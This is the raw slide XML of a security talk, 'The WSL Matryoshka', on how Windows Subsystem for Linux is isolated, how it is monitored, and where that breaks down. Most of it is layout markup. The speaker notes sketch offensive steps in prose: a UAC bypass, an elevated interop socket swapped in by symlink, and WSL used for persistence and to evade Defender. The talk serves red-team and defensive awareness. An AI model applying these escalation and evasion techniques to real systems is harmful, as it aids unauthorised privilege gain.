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JetBrains Mono ExtraBold"/>
      <p:bold r:id="rId47"/>
      <p:boldItalic r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="JetBrains Mon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kub Wróbe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303852-4C76-49B2-B6D6-87ABED8BA39D}">
  <a:tblStyle styleId="{EA303852-4C76-49B2-B6D6-87ABED8BA3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JetBrainsMonoExtraBold-boldItalic.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/JetBrainsMonoExtraBold-bold.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/JetBrainsMon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JetBrainsMono-italic.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/JetBrainsMono-bold.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/JetBrainsMon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6-13T08:46:53.428">
    <p:pos x="6000" y="0"/>
    <p:text>test test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6df185b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6df185b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5898c4c9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5898c4c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610f6c6ab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610f6c6ab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note: integrity level ‘high’ = the process was elevated after accepting the UAC, so if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t> run WSL elevated, the 9p server will have all the access to the C:\ drive; do NOT run WSL as an admin I guess?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2202249c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2202249c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6df185b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6df185b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fc25eef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c25eef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10f6c6ab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10f6c6ab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5fc25eef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fc25eef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fc25eef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fc25eef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fc25eef1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fc25eef1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check whether this is true for the default config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6b4dd6e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36b4dd6e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60039666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6003966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bda166a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bda166a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ignore the error message, it’s only about the path translation; if you don’t know which Linux you’ll end up on, use –system to utilize CBL Mariner system distro, you can change root to nologin on any distro, except for system one, which resets after every reboot :)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6220c5988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6220c5988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default distro root filesystem is mounted under /mnt/wslg/distro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797f7cc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797f7cc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it requires reboot of the distro, however, please note: it is not going to prevent WSL as a persistence method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fc25eef1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fc25eef1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5fc25eef1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5fc25eef1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66df185b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66df185b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67a81c5b9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67a81c5b9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67a81c5b9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67a81c5b9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fc25eef1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5fc25eef1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1e3a37c2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1e3a37c2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execute uac bypass of your choice, use wsl.exe to launch a dbus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>demon in a background; stays in the background no console window; replace the current interop socket with the elevated by symbolic link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10f6c6a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10f6c6a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ask how many of you are monitoring the WSL usage in your company or utilize WSL in red teaming engagements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7a81c5b9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67a81c5b9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66d8ce71c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66d8ce71c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66d8ce71c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66d8ce71c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6b4dd6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36b4dd6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fc25eef1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5fc25eef1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220c5988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220c5988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220c5988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6220c5988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6220c5988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6220c5988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622046a8f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22046a8f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622046a8f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622046a8f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55898c4c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55898c4c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622046a8f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622046a8f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622046a8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622046a8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5898c4c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5898c4c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10f6c6a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10f6c6a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5898c4c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5898c4c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0" y="1546000"/>
            <a:ext cx="8520600" cy="1251300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="38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200"/>
              <a:buFont typeface="JetBrains Mono ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono ExtraBold"/>
                <a:ea typeface="JetBrains Mono ExtraBold"/>
                <a:cs typeface="JetBrains Mono ExtraBold"/>
                <a:sym typeface="JetBrains Mono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JetBrains Mono"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="JetBrains Mono"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mon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27.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learn.microsoft.com/en-us/windows/wsl/intun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rive.google.com/file/d/1wqRrIBnf5HZ_mLVYibtssthex14aY4Qj/view" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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wAqpz7lMlOlbuPEpTxoqCCEwqQQ44glY/view" TargetMode="Externa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LOLBAS-Project/LOLBAS/pull/378" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ws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title="output-onlinepngtools.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="340012"/>
            <a:ext cx="4176500" cy="4176500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Google Shape;55;p13" title="output-onlinepngtools.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810600" y="1238325"/>
            <a:ext cx="3250576" cy="3250576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Google Shape;56;p13" title="output-onlinepngtools.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6968275" y="1994825"/>
            <a:ext cx="2494076" cy="2494076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1231100"/>
            <a:ext cx="5171700" cy="239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pl" sz="5320">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The WSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="5320">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="5320">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Matryoshka</a:t>
            </a:r>
            <a:endParaRPr sz="5320">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3625400"/>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sz="1600"/>
              <a:t>Jakub Wróbel</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1600"/>
              <a:t>Konrad Klawikowski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Linux namespaces</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Google Shape;143;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4961544" y="0"/>
            <a:ext cx="3870761" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="3916800" cy="36426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45" name="Google Shape;145;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645156" y="1712657"/>
            <a:ext cx="3256500" cy="9186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46" name="Google Shape;146;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645156" y="2855853"/>
            <a:ext cx="3256500" cy="9186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47" name="Google Shape;147;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636031" y="1130394"/>
            <a:ext cx="32565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Linux VM (CBL Mariner)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645156" y="1748271"/>
            <a:ext cx="32565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Debian</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636031" y="2855876"/>
            <a:ext cx="32565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Ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771800" y="2125318"/>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1" name="Google Shape;151;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803703" y="2125318"/>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2" name="Google Shape;152;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2835606" y="2125318"/>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3" name="Google Shape;153;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771800" y="3232911"/>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4" name="Google Shape;154;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803703" y="3232911"/>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5" name="Google Shape;155;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2835606" y="3232911"/>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6" name="Google Shape;156;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762675" y="3999049"/>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7" name="Google Shape;157;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1794578" y="3999049"/>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8" name="Google Shape;158;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826481" y="3999049"/>
            <a:ext cx="939600" cy="405300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="952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59" name="Google Shape;159;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877964" y="2139384"/>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mnt</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918992" y="2139384"/>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pid</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2960020" y="2139384"/>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uts</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868839" y="3246977"/>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mnt</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909867" y="3246977"/>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pid</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2950895" y="3246977"/>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uts</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868839" y="4013115"/>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mnt</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909867" y="4013115"/>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pid</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2950895" y="4013115"/>
            <a:ext cx="708900" cy="3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uts</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4660325"/>
            <a:ext cx="41838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500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>note: no separate ‘net’ namespace</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>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title="Screenshot 2025-06-09 at 20.41.46.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="445000" y="2363275"/>
            <a:ext cx="6244376" cy="2354300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;17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9p</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="Google Shape;175;p23" title="Screenshot 2025-06-09 at 20.42.28.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2916544" y="148900"/>
            <a:ext cx="6021157" cy="2270151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2916550" y="1895425"/>
            <a:ext cx="4485600" cy="15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77" name="Google Shape;177;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445000" y="4187775"/>
            <a:ext cx="4653300" cy="15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78" name="Google Shape;178;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539150" y="2508075"/>
            <a:ext cx="6092400" cy="15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79" name="Google Shape;179;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041725" y="292325"/>
            <a:ext cx="5421900" cy="152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Intune settings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="940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 please note: most affect</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t> ONLY “Store” WSL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="Google Shape;186;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4176008" y="519400"/>
            <a:ext cx="4861367" cy="4259275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4778675"/>
            <a:ext cx="5217300" cy="3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200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>further reference: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Intune settings | Microsoft Learn</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains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275850" y="8784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l" sz="3200"/>
              <a:t>Windows Defender plugin for WSL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="193" name="Google Shape;193;p25" title="signal-2025-06-04-64233 PM.jpeg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5522" l="0" r="0" t="7649"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2954988" y="1872550"/>
            <a:ext cx="3234024" cy="2186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Windows Defender plugin for WSL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3192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l"/>
              <a:t>“The Defender for Endpoint for WSL plug-in enables Defender for Endpoint to provide more visibility into all running WSL containers by plugging into the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="pl"/>
              <a:t>[not so :P]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl"/>
              <a:t>isolated subsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
              <a: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pl"/>
              <a:t>“The plug-in provides visibility into events from WSL, but other features like </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>antimalware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>, threat and vulnerability management, and response commands </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are not available</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
